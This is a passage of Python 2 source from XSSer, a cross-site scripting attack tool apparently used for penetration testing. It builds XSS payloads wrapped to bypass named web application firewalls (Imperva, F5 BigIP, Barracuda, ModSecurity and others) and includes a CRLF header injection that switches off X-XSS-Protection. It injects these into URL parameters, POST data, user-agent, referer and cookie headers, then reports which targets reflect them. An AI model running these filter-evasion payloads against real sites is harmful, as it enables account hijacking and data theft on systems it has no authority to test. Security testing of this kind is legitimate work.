  620. # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
  621. if options.phpids070:
  622. payload_string = '<svg+onload=+"'+payload_string+'">'
  623. # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016
  624. if options.imperva:
  625. payload_string = '<img src=x onerror="'+payload_string+'">'
  626. # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016
  627. if options.webknight:
  628. payload_string = '<details ontoggle='+payload_string+'>'
  629. # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016
  630. if options.f5bigip:
  631. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
  632. # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016
  633. if options.barracuda:
  634. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
  635. # Apache / modsec [ALL] payload: special 18/02/2016
  636. if options.modsec:
  637. payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
  638. # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016
  639. if options.quickdefense:
  640. payload_string = '<details ontoggle="'+payload_string+'">'
  641. # Firefox 12 (and below) # 09/2019
  642. if options.firefox:
  643. payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
  644. # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
  645. if options.chrome:
  646. payload_string = "<script>/*///*/"+payload_string+"</script>"
  647. # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
  648. if options.iexplorer:
  649. payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
  650. # Opera 10.6 (but also IE6) # 09/2019
  651. if options.opera:
  652. payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
  653. # Substitute the attacking hash
  654. if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
  655. payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
  656. payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
  657. hashed_payload = payload_string
  658. # Imperva
  659. if options.imperva:
  660. hashed_payload = urllib.urlencode({'':hashed_payload})
  661. hashed_payload = urllib.urlencode({'':hashed_payload}) #DoubleURL encoding
  662. hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
  663. hashed_payload = unicode(hashed_payload) # + Unicode
  664. # Quick Defense
  665. if options.quickdefense:
  666. hashed_payload = unicode(hashed_payload) # + Unicode
  667. # apply user final attack url payload
  668. if user_attack_payload:
  669. hashed_vector_url = self.encoding_permutations(user_attack_payload)
  670. else:
  671. hashed_vector_url = self.encoding_permutations(hashed_payload)
  672. # replace special payload string also for extra attacks
  673. if self.extra_hashed_injections:
  674. hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
  675. for k, v in self.extra_hashed_injections.iteritems():
  676. if v[1] in hashed_payload:
  677. self.extra_hashed_vector_url[k] = v[0], hashed_payload
  678. self.extra_hashed_injections = self.extra_hashed_vector_url
  679. if not options.getdata: # using GET as a single input (-u)
  680. target_url = url
  681. else:
  682. if not url.endswith("/") and not options.getdata.startswith("/"):
  683. url = url + "/"
  684. target_url = url + options.getdata
  685. p_uri = urlparse(target_url)
  686. uri = p_uri.netloc
  687. path = p_uri.path
  688. if not uri.endswith('/') and not path.startswith('/'):
  689. uri = uri + "/"
  690. if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
  691. if not "XSS" in target_url:
  692. if not target_url.endswith("/"):
  693. target_url = target_url + "/XSS"
  694. else:
  695. target_url = target_url + "XSS"
  696. target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
  697. if self.options.script:
  698. if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
  699. self.not_keyword_exit()
  700. if not target_params and not options.postdata:
  701. if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
  702. if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
  703. self.not_keyword_exit()
  704. else: # keyword found at target url (ex: https://target.com/XSS)
  705. if 'XSS' in target_url:
  706. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  707. elif 'X1S' in target_url:
  708. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  709. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  710. if "[B64]" in hashed_payload: # [DCP Injection]
  711. dcp_payload = hashed_payload.split("[B64]")[1]
  712. dcp_preload = hashed_payload.split("[B64]")[0]
  713. dcp_payload = b64encode(dcp_payload)
  714. hashed_payload = dcp_preload + dcp_payload
  715. self.hashed_injections[url_orig_hash] = target_url
  716. if user_attack_payload:
  717. pass
  718. else:
  719. hashed_vector_url = self.encoding_permutations(hashed_payload)
  720. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
  721. target_url_params = urllib.urlencode(target_params)
  722. if not uri.endswith('/') and not path.startswith('/'):
  723. uri = uri + "/"
  724. dest_url = p_uri.scheme + "://" + uri + path
  725. if not "XSS" in dest_url:
  726. if not dest_url.endswith("/"):
  727. dest_url = dest_url + "/" + hashed_vector_url
  728. else:
  729. dest_url = dest_url + hashed_vector_url
  730. else:
  731. if 'XSS' in dest_url:
  732. dest_url = dest_url.replace('XSS', hashed_vector_url)
  733. if 'X1S' in dest_url:
  734. dest_url = dest_url.replace('X1S', hashed_vector_url)
  735. else:
  736. if 'XSS' in target_url:
  737. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  738. elif 'X1S' in target_url:
  739. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  740. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  741. if "[B64]" in hashed_payload: # [DCP Injection]
  742. dcp_payload = hashed_payload.split("[B64]")[1]
  743. dcp_preload = hashed_payload.split("[B64]")[0]
  744. dcp_payload = b64encode(dcp_payload)
  745. hashed_payload = dcp_preload + dcp_payload
  746. self.hashed_injections[url_orig_hash] = target_url
  747. if user_attack_payload:
  748. pass
  749. else:
  750. hashed_vector_url = self.encoding_permutations(hashed_payload)
  751. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
  752. target_url_params = urllib.urlencode(target_params)
  753. if not uri.endswith('/') and not path.startswith('/'):
  754. uri = uri + "/"
  755. dest_url = p_uri.scheme + "://" + uri + path
  756. if 'XSS' in dest_url:
  757. dest_url = dest_url.replace('XSS', hashed_vector_url)
  758. if 'X1S' in dest_url:
  759. dest_url = dest_url.replace('X1S', hashed_vector_url)
  760. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  761. else:
  762. if not options.postdata:
  763. r = 0
  764. for key, value in target_params.iteritems(): # parse params searching for keywords
  765. for v in value:
  766. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
  767. if v == 'XSS':
  768. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  769. elif v == 'X1S':
  770. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  771. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  772. if "[B64]" in hashed_payload: # [DCP Injection]
  773. dcp_payload = hashed_payload.split("[B64]")[1]
  774. dcp_preload = hashed_payload.split("[B64]")[0]
  775. dcp_payload = b64encode(dcp_payload)
  776. hashed_payload = dcp_preload + dcp_payload
  777. self.hashed_injections[url_orig_hash] = key
  778. if user_attack_payload:
  779. pass
  780. else:
  781. hashed_vector_url = self.encoding_permutations(hashed_payload)
  782. target_params[key] = hashed_vector_url
  783. r = r + 1
  784. else:
  785. if self.options.xsa or self.options.xsr or self.options.coo:
  786. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  787. self.hashed_injections[url_orig_hash] = key
  788. target_params[key] = v
  789. r = r + 1
  790. else:
  791. target_params[key] = v
  792. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
  793. self.not_keyword_exit()
  794. payload_url = query_string.strip() + hashed_vector_url
  795. target_url_params = urllib.urlencode(target_params)
  796. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  797. else: # using POST provided by parameter (-p)
  798. target_params = parse_qs(query_string, keep_blank_values=True)
  799. r = 0
  800. for key, value in target_params.iteritems(): # parse params searching for keywords
  801. for v in value:
  802. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
  803. if v == 'XSS':
  804. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  805. elif v == 'X1S':
  806. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  807. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  808. if "[B64]" in hashed_payload: # [DCP Injection]
  809. dcp_payload = hashed_payload.split("[B64]")[1]
  810. dcp_preload = hashed_payload.split("[B64]")[0]
  811. dcp_payload = b64encode(dcp_payload)
  812. hashed_payload = dcp_preload + dcp_payload
  813. self.hashed_injections[url_orig_hash] = key
  814. if user_attack_payload:
  815. pass
  816. else:
  817. hashed_vector_url = self.encoding_permutations(hashed_payload)
  818. target_params[key] = hashed_vector_url
  819. r = r + 1
  820. else:
  821. if self.options.xsa or self.options.xsr or self.options.coo:
  822. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  823. self.hashed_injections[url_orig_hash] = key
  824. target_params[key] = v
  825. r = r + 1
  826. else:
  827. target_params[key] = v
  828. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
  829. self.not_keyword_exit()
  830. target_url_params = urllib.urlencode(target_params)
  831. dest_url = target_url_params
  832. self._ongoing_attacks['url'] = url_orig_hash
  833. return dest_url, agent, referer, cookie
  834. def attack_url_payload(self, url, payload, query_string):
  835. if not self.pool:
  836. pool = self.mothership.pool
  837. else:
  838. pool = self.pool
  839. c = Curl()
  840. if self.options.getdata or not self.options.postdata:
  841. dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
  842. def _cb(request, result):
  843. self.finish_attack_url_payload(c, request, result, payload,
  844. query_string, url, dest_url)
  845. _error_cb = self.error_attack_url_payload
  846. def _error_cb(request, error):
  847. self.error_attack_url_payload(c, url, request, error)
  848. c.agent = agent
  849. c.referer = referer
  850. c.cookie = cookie
  851. if " " in dest_url: # parse blank spaces
  852. dest_url = dest_url.replace(" ", "+")
  853. pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
  854. self._ongoing_requests += 1
  855. if self.options.postdata:
  856. dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
  857. def _cb(request, result):
  858. self.finish_attack_url_payload(c, request, result, payload,
  859. query_string, url, dest_url)
  860. _error_cb = self.error_attack_url_payload
  861. def _error_cb(request, error):
  862. self.error_attack_url_payload(c, url, request, error)
  863. dest_url = dest_url.strip().replace("/", "", 1)
  864. c.agent = agent
  865. c.referer = referer
  866. c.cookie = cookie
  867. pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
  868. self._ongoing_requests += 1
  869. def error_attack_url_payload(self, c, url, request, error):
  870. self._ongoing_requests -= 1
  871. for reporter in self._reporters:
  872. reporter.mosquito_crashed(url, str(error[0]))
  873. dest_url = request.args[0]
  874. self.report("Failed attempt (URL Malformed!?): " + url + "\n")
  875. self.urlmalformed = True
  876. if self.urlmalformed == True and self.urlspoll[0] == url:
  877. self.land()
  878. self.report(str(error[0]))
  879. if self.options.verbose:
  880. traceback.print_tb(error[2])
  881. c.close()
  882. del c
  883. return
  884. def finish_attack_url_payload(self, c, request, result, payload,
  885. query_string, url, dest_url):
  886. self.round_complete = self.round_complete + 1
  887. self.report("="*75)
  888. self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
  889. self.report("="*75)
  890. self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
  891. self._ongoing_requests -= 1
  892. # adding constant head check number flag
  893. if self.options.isalive:
  894. self.flag_isalive_num = int(self.options.isalive)
  895. if self.options.isalive <= 0:
  896. pass
  897. elif self.options.isalive and not self.options.nohead:
  898. self.errors_isalive = self.errors_isalive + 1
  899. if self.errors_isalive > self.options.isalive:
  900. pass
  901. else:
  902. self.report("---------------------")
  903. self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
  904. if self.next_isalive == True:
  905. hc = Curl()
  906. self.next_isalive = False
  907. try:
  908. urls = hc.do_head_check([url])
  909. except:
  910. print "[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n"
  911. self.errors_isalive = 0
  912. return
  913. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
  914. print "HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n"
  915. print "- Your target still Alive: " + "(" + url + ")"
  916. print "- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n"
  917. print " - your injections are failing: normal :-)"
  918. print " - maybe exists some IPS/NIDS/... systems blocking your requests!\n"
  919. else:
  920. if str(hc.info()["http-code"]) == "0":
  921. print "\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n"
  922. else:
  923. print "HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n"
  924. print "- Your target " + "(" + url + ")" + " looks that is NOT alive"
  925. print "- If you are receiving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n"
  926. self.errors_isalive = 0
  927. else:
  928. if str(self.errors_isalive) >= str(self.options.isalive):
  929. self.report("---------------------")
  930. self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
  931. self.next_isalive = True
  932. self.options.isalive = self.flag_isalive_num
  933. else:
  934. if self.options.isalive and self.options.nohead:
  935. self.report("---------------------")
  936. self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
  937. self.report("---------------------")
  938. # check results an alternative url, choosing method and parameters, or not
  939. if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
  940. self.options.altm = "GET"
  941. if self.options.altm == "post":
  942. self.options.altm = "POST"
  943. if self.options.alt == None:
  944. pass
  945. else:
  946. self.report("="*45)
  947. self.report("[+] Checking Response Options:", "\n")
  948. self.report("[+] Url:", self.options.alt)
  949. self.report("[-] Method:", self.options.altm)
  950. if self.options.ald:
  951. self.report("[-] Parameter(s):", self.options.ald, "\n")
  952. else:
  953. self.report("[-] Parameter(s):", query_string, "\n")
  954. if c.info()["http-code"] in ["200", "302", "301"]:
  955. if self.options.statistics:
  956. self.success_connection = self.success_connection + 1
  957. self._report_attack_success(c, dest_url, payload,
  958. query_string, url)
  959. else:
  960. self._report_attack_failure(c, dest_url, payload,
  961. query_string, url)
  962. # checking response results
  963. if self.options.alt == None:
  964. pass
  965. else:
  966. self.report("="*45)
  967. self.report("[+] Checking Response Results:", "\n")
  968. self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
  969. if 'PAYLOAD' in payload['payload']:
  970. user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
  971. if self.options.ald:
  972. query_string = self.options.ald
  973. if "VECTOR" in self.options.alt:
  974. dest_url = self.options.alt
  975. else:
  976. if not dest_url.endswith("/"):
  977. dest_url = dest_url + "/"
  978. if self.options.altm == 'POST':
  979. dest_url = "" + query_string + user_attack_payload
  980. dest_url = dest_url.strip().replace("/", "", 1)
  981. data = c.post(url, dest_url)
  982. else:
  983. dest_url = self.options.alt + query_string + user_attack_payload
  984. c.get(dest_url)
  985. # perform check response injection
  986. if c.info()["http-code"] in ["200", "302", "301"]:
  987. if self.options.statistics:
  988. self.success_connection = self.success_connection + 1
  989. self._report_attack_success(c, dest_url, payload,
  990. query_string, url)
  991. else:
  992. self._report_attack_failure(c, dest_url, payload,
  993. query_string, url)
  994. c.close()
  995. del c
  996. def encoding_permutations(self, enpayload_url):
  997. """
  998. perform encoding permutations on the url and query_string.
  999. """
  1000. options = self.options
  1001. if options.Cem:
  1002. enc_perm = options.Cem.split(",")
  1003. for _enc in enc_perm:
  1004. enpayload_url = self.encmap[_enc](enpayload_url)
  1005. else:
  1006. for enctype in self.encmap.keys():
  1007. if getattr(options, enctype):
  1008. enpayload_url = self.encmap[enctype](enpayload_url)
  1009. return enpayload_url
  1010. def _report_attack_success(self, curl_handle, dest_url, payload,\
  1011. query_string, orig_url):
  1012. """
  1013. report connection success of an attack
  1014. """
  1015. if not orig_url in self.successful_urls:
  1016. self.successful_urls.append(orig_url)
  1017. options = self.options
  1018. current_hashes = [] # to check for ongoing hashes
  1019. if payload['browser'] == "[Heuristic test]":
  1020. for key, value in self.hashed_injections.iteritems():
  1021. if str(key) in dest_url:
  1022. if key not in current_hashes:
  1023. self.final_hashes[key] = value
  1024. current_hashes.append(key)
  1025. elif self.options.hash:
  1026. for key, value in self.hashed_injections.iteritems():
  1027. self.final_hashes[key] = value
  1028. current_hashes.append(key)
  1029. else:
  1030. self.report("-"*45)
  1031. self.report("\n[!] Hashing: \n")
  1032. for key, value in self.hashed_injections.iteritems():
  1033. if str(key) in dest_url:
  1034. if key not in current_hashes:
  1035. self.report(" [ " +key+" ] : [" , value + " ]")
  1036. self.final_hashes[key] = value
  1037. current_hashes.append(key)
  1038. else:
  1039. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1040. b64_string = payload["payload"].split("[B64]")
  1041. b64_string = b64_string[1]
  1042. b64_string = b64_string.replace('PAYLOAD', key)
  1043. b64_string = b64encode(b64_string)
  1044. b64_string = urllib.urlencode({'':b64_string})
  1045. if b64_string.startswith("="):
  1046. b64_string = b64_string.replace("=", "")
  1047. if str(b64_string) in str(dest_url):
  1048. if key not in current_hashes:
  1049. self.report(" [ " +key+" ] : [" , value + " ]")
  1050. self.final_hashes[key] = value
  1051. current_hashes.append(key)
  1052. else: # when using encoders (Str, Hex, Dec...)
  1053. payload_string = payload["payload"].replace("PAYLOAD", key)
  1054. hashed_payload = self.encoding_permutations(payload_string)
  1055. if self.options.Cem:
  1056. enc_perm = options.Cem.split(",")
  1057. for e in enc_perm:
  1058. hashed_payload = self.encoding_permutations(payload_string)
  1059. if e == "Str":
  1060. hashed_payload = hashed_payload.replace(",", "%2C")
  1061. if e == "Mix":
  1062. hashed_payload=urllib.quote(hashed_payload)
  1063. if e == "Dec":
  1064. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1065. if e == "Hex":
  1066. hashed_payload = hashed_payload.replace("%", "%25")
  1067. if e == "Hes":
  1068. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1069. hashed_payload = hashed_payload.replace(";", "%3B")
  1070. else:
  1071. if self.options.Str:
  1072. hashed_payload = hashed_payload.replace(",", "%2C")
  1073. if self.options.Mix:
  1074. hashed_payload=urllib.quote(hashed_payload)
  1075. if self.options.Dec:
  1076. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1077. if self.options.Hex:
  1078. hashed_payload = hashed_payload.replace("%", "%25")
  1079. if self.options.Hes:
  1080. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1081. hashed_payload = hashed_payload.replace(";", "%3B")
  1082. if str(hashed_payload) in str(dest_url):
  1083. if key not in current_hashes:
  1084. self.report(" [ " +key+" ] : [" , value + " ]")
  1085. self.final_hashes[key] = value
  1086. if self.extra_hashed_injections:
  1087. for k, v in self.extra_hashed_injections.iteritems():
  1088. payload_url = str(v[1])
  1089. if payload_url == payload["payload"]:
  1090. if k not in current_hashes:
  1091. self.report(" [ " +k+" ] : [" , v[0] + " ]")
  1092. self.final_hashes[k] = v[0]
  1093. current_hashes.append(k)
  1094. self.report("\n"+"-"*45+"\n")
  1095. if payload['browser'] == "[Heuristic test]":
  1096. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
  1097. else:
  1098. if self.extra_hashed_injections:
  1099. extra_attacks=[]
  1100. if options.xsa:
  1101. extra_attacks.append("XSA")
  1102. if options.xsr:
  1103. extra_attacks.append("XSR")
  1104. if options.coo:
  1105. extra_attacks.append("COO")
  1106. if extra_attacks:
  1107. extra_attacks = "+ "+ str(extra_attacks)
  1108. if options.postdata:
  1109. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
  1110. else:
  1111. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
  1112. else:
  1113. if options.postdata:
  1114. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
  1115. else:
  1116. self.report("[*] Trying: \n\n" + dest_url.strip() + "\n")
  1117. if not self.options.hash and not self.options.script:
  1118. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
  1119. pass
  1120. else:
  1121. self.report("-"*45)
  1122. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
  1123. pass
  1124. else:
  1125. if not "XSS" in dest_url or not "X1S" in dest_url:
  1126. if self.options.xsa or self.options.xsr or self.options.coo:
  1127. pass
  1128. else:
  1129. self.report("-"*45)
  1130. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1131. if not self.options.verbose:
  1132. self.report("-"*45 + "\n")
  1133. else:
  1134. self.report("-"*45)
  1135. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1136. if not self.options.verbose:
  1137. self.report("-"*45 + "\n")
  1138. # statistics injections counters
  1139. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
  1140. self.check_positives = self.check_positives + 1
  1141. elif payload['browser']=="[Data Control Protocol Injection]":
  1142. self.dcp_injection = self.dcp_injection + 1
  1143. elif payload['browser']=="[Document Object Model Injection]":
  1144. self.dom_injection = self.dom_injection + 1
  1145. elif payload['browser']=="[Induced Injection]":
  1146. self.httpsr_injection = self.httpsr_injection + 1
  1147. elif payload['browser']=="[manual_injection]":
  1148. self.manual_injection = self.manual_injection + 1
  1149. else:
  1150. self.auto_injection = self.auto_injection +1
  1151. if not self.hashed_injections:
  1152. for k, v in self.extra_hashed_injections.iteritems():
  1153. if k in current_hashes:
  1154. if v[0] == "XSA":
  1155. agent = v[1]
  1156. agent = agent.replace("PAYLOAD", k)
  1157. Curl.agent = agent
  1158. if v[0] == "XSR":
  1159. referer = v[1]
  1160. referer = referer.replace("PAYLOAD", k)
  1161. Curl.referer = referer
  1162. if v[0] == "COO":
  1163. cookie = v[1]
  1164. cookie = cookie.replace("PAYLOAD", k)
  1165. Curl.cookie = cookie
  1166. else:
  1167. for key, value in self.hashed_injections.iteritems():
  1168. for k, v in self.extra_hashed_injections.iteritems():
  1169. payload_url = v[1]
  1170. payload_url = payload_url.replace("PAYLOAD",key)
  1171. payload_url = payload_url.replace(" ", "+") # black magic!
  1172. final_dest_url = str(urllib.unquote(dest_url.strip()))
  1173. if payload_url in final_dest_url:
  1174. if v[0] == "XSA":
  1175. agent = v[1]
  1176. agent = agent.replace("PAYLOAD", k)
  1177. Curl.agent = agent
  1178. if v[0] == "XSR":
  1179. referer = v[1]
  1180. referer = referer.replace("PAYLOAD", k)
  1181. Curl.referer = referer
  1182. if v[0] == "COO":
  1183. cookie = v[1]
  1184. cookie = cookie.replace("PAYLOAD", k)
  1185. Curl.cookie = cookie
  1186. else:
  1187. if k in current_hashes:
  1188. if v[0] == "XSA":
  1189. agent = v[1]
  1190. agent = agent.replace("PAYLOAD", k)
  1191. Curl.agent = agent
  1192. if v[0] == "XSR":
  1193. referer = v[1]
  1194. referer = referer.replace("PAYLOAD", k)
  1195. Curl.referer = referer
  1196. if v[0] == "COO":
  1197. cookie = v[1]
  1198. cookie = cookie.replace("PAYLOAD", k)
  1199. Curl.cookie = cookie
  1200. if options.verbose:
  1201. self.report("-"*45)
  1202. self.report("\n[+] HTTP Headers Verbose:\n")
  1203. self.report(" [Client Request]")
  1204. Curl.print_options()
  1205. self.report(" [Server Reply]\n")
  1206. self.report(curl_handle.info())
  1207. self.report("="*45)
  1208. self.report("[*] Injection(s) Results:")
  1209. self.report("="*45 + "\n")
  1210. if payload['browser']=="[Heuristic test]":
  1211. for key, value in self.final_hashes.iteritems():
  1212. if str(key) in dest_url:
  1213. heuristic_string = key
  1214. heuristic_param = str(payload['payload']).strip('XSS')
  1215. # checking heuristic responses
  1216. if heuristic_string in curl_handle.body():
  1217. # ascii
  1218. if heuristic_param == "\\":
  1219. self.heuris_backslash_found = self.heuris_backslash_found + 1
  1220. # / same as ASCII and Unicode
  1221. elif heuristic_param == "/":
  1222. self.heuris_slash_found = self.heuris_slash_found + 1
  1223. self.heuris_une_slash_found = self.heuris_une_slash_found + 1
  1224. elif heuristic_param == ">":
  1225. self.heuris_mayor_found = self.heuris_mayor_found + 1
  1226. elif heuristic_param == "<":
  1227. self.heuris_minor_found = self.heuris_minor_found + 1
  1228. elif heuristic_param == ";":
  1229. self.heuris_semicolon_found = self.heuris_semicolon_found + 1
  1230. elif heuristic_param == "'":
  1231. self.heuris_colon_found = self.heuris_colon_found + 1
  1232. elif heuristic_param == '"':
  1233. self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
  1234. elif heuristic_param == "=":
  1235. self.heuris_equal_found = self.heuris_equal_found + 1
  1236. # une
  1237. elif heuristic_param == "%5C":
  1238. self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
  1239. elif heuristic_param == "%3E":
  1240. self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
  1241. elif heuristic_param == "%3C":
  1242. self.heuris_une_minor_found = self.heuris_une_minor_found + 1
  1243. elif heuristic_param == "%3B":
  1244. self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
  1245. elif heuristic_param == "%27":
  1246. self.heuris_une_colon_found = self.heuris_une_colon_found + 1
  1247. elif heuristic_param == "%22":
  1248. self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
  1249. elif heuristic_param == "%3D":
  1250. self.heuris_une_equal_found = self.heuris_une_equal_found + 1
  1251. # dec
  1252. elif heuristic_param == "&#92":
  1253. self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
  1254. elif heuristic_param == "&#47":
  1255. self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
  1256. elif heuristic_param == "&#62":
  1257. self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
  1258. elif heuristic_param == "&#60":
  1259. self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
  1260. elif heuristic_param == "&#59":
  1261. self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
  1262. elif heuristic_param == "&#39":
  1263. self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
  1264. elif heuristic_param == "&#34":
  1265. self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
  1266. elif heuristic_param == "&#61":
  1267. self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
  1268. self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
  1269. else:
  1270. if heuristic_param == "\\":
  1271. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
  1272. elif heuristic_param == "/":
  1273. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
  1274. elif heuristic_param == ">":
  1275. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
  1276. elif heuristic_param == "<":
  1277. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
  1278. elif heuristic_param == ";":
  1279. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
  1280. elif heuristic_param == "'":
  1281. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
  1282. elif heuristic_param == '"':
  1283. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
  1284. elif heuristic_param == "=":
  1285. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
  1286. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
  1287. elif self.options.hash:
  1288. for key, value in self.final_hashes.iteritems():
  1289. if str(key) in dest_url:
  1290. if key in curl_handle.body():
  1291. self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
  1292. else:
  1293. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
  1294. else:
  1295. for key, value in self.final_hashes.iteritems():
  1296. if key in current_hashes:
  1297. if "XSA" in value:
  1298. method = "XSA"
  1299. hashing = key
  1300. elif "XSR" in value:
  1301. method = "XSR"
  1302. hashing = key
  1303. elif "COO" in value:
  1304. method = "COO"
  1305. hashing = key
  1306. else:
  1307. method = value
  1308. hashing = key
  1309. if not hashing:
  1310. pass
  1311. else:
  1312. if hashing not in dest_url:
  1313. if key in current_hashes:
  1314. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1315. b64_string = payload["payload"].split("[B64]")
  1316. b64_string = b64_string[1]
  1317. b64_string = b64_string.replace('PAYLOAD', key)
  1318. b64_string = b64encode(b64_string)
  1319. b64_string = urllib.urlencode({'':b64_string})
  1320. if b64_string.startswith("="):
  1321. b64_string = b64_string.replace("=", "")
  1322. if str(b64_string) in str(dest_url):
  1323. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1324. else:
  1325. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1326. else:
  1327. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1328. self.report("")
  1329. def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
  1330. options = self.options
